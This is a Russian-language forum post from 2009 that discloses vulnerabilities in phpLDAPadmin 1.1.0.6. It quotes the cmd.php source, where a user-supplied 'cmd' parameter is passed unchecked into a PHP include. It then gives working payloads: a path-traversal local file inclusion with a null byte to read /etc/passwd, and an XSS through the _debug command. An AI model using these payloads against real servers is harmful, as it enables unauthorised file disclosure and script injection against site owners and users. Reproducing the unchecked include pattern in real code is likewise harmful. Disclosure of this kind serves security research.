oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
Сайт: http://phpldapadmin.sourceforge.net/wiki/index.php/Main_Page
Версия: 1.1.0.6
Файл: /usr/share/phpldapadmin/htdocs/cmd.php
...
$www['cmd'] = get_request('cmd','REQUEST');
$www['meth'] = get_request('meth','REQUEST');
ob_start();
$file = '';
switch ($www['cmd']) {
case '_debug' :
debug_dump($_REQUEST,1);
break;
default :
if (defined('HOOKSDIR') && file_exists(HOOKSDIR.$www['cmd'].'.php'))
$file = HOOKSDIR.$www['cmd'].'.php';
elseif (defined('HTDOCDIR') && file_exists(HTDOCDIR.$www['cmd'].'.php'))
$file = HTDOCDIR.$www['cmd'].'.php';
elseif (file_exists('welcome.php'))
$file = 'welcome.php';
}
if (DEBUG_ENABLED)
debug_log('Ready to render page for command [%s,%s].',128,__FILE__,__LINE__,__METHOD__,$www['cmd'],$file);
# Create page.
$www['page'] = new page($ldapserver->server_id);
if ($file)
include $file;
...
Тут и локальный инклюд: /cmd.php?cmd=../../../../../../../../etc/passwd%00
И XSS (нахера она правда нужна - хз, до кучи ;)): /cmd.php?cmd=_debug&a=[xss]
oRb (15.07.2009)
|
phpLDAPadmin - 
